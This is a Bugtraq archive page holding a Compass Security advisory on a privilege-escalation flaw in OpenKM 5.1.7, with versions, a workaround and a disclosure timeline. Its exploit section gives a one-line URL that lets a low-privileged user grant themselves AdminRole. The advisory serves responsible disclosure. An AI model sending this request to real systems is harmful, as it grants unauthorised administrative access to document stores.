lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4B70B66DA655F144855183C68062EE89C6A2E0@trexchange.csnc.ch>
Date: Tue, 3 Jan 2012 13:47:39 +0100
From: "Cyrill Brunschwiler" <cyrill.brunschwiler@...c.ch>
To: <bugtraq@...urityfocus.com>
Subject: OpenKM 5.1.7 Privilege Escalation

########################################################################
##
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/ 
########################################################################
##
#
# ID:      COMPASS-2012-001
# Product: OpenKM Document Management System 5.1.7 [1]
# Vendor:  OpenKM http://www.openkm.com/
# Subject: Privilege Escalation, Improper Access Control
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Cyrill Brunschwiler (cyrill.brunschwiler@...c.ch)
# Date:    August 6th 2011
#
########################################################################
##

Description:
------------
Cyrill Brunschwiler, Security Analyst at Compass Security Network
Computing,
Switzerland discovered an authorization flaw in the OpenKM solution.
OpenKM
does allow application administrators to manage users and to assign
roles.
Unfortunately, a standard user having the UserRole may alter the roles
of
existing account. This is possible because OpenKM does not properly
check
for the sufficient privileges. The changes are being applied even though
the
OpenKM user interface displays an "insufficient privileges" message to
the
unprivileged user.

Vulnerable:
-----------
OpenKM version 5.1.7

Not vulnerable:
---------------
OpenKM version 5.1.8

Workaround:
-----------
Grant access to /OpenKM/admin path to specific IPs only (requires
additional
WAF, Reverse Proxy setup[2] or web server IP restriction)

Exploit:
--------
Login as low privileged User (having the UserRole) and call the
following
URL to gain administrative privileges.

http://example.com/OpenKM/admin/Auth?action=userEdit&persist=true&usr_id
=usr&usr_active=on&usr_roles=AdminRole

Timeline:
---------
August 6th, Vulnerability discovered
August 9th, Vendor contacted
August 10th, Vendor notified
December 1st, Patched version released
January 2nd, Advisory released

References:
-----------
[1] OpenKM http://www.openkm.com/
is an Free/Libre document management system that provides a web
interface for
managing arbitrary files. OpenKM includes a content repository, Lucene
indexing, and jBPM workflow. The OpenKM system was developed using Java
technology.

[2] Open Source Web Entry Server 
Talk at OWASP Appsec Washington D.C. in November 2010 about setting up
an 
Apache based Open Source Web Entry Server
https://www.owasp.org/images/f/f4/AppSecDC_Open_Source_Web_Entry_Server_
V2.2.ppt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ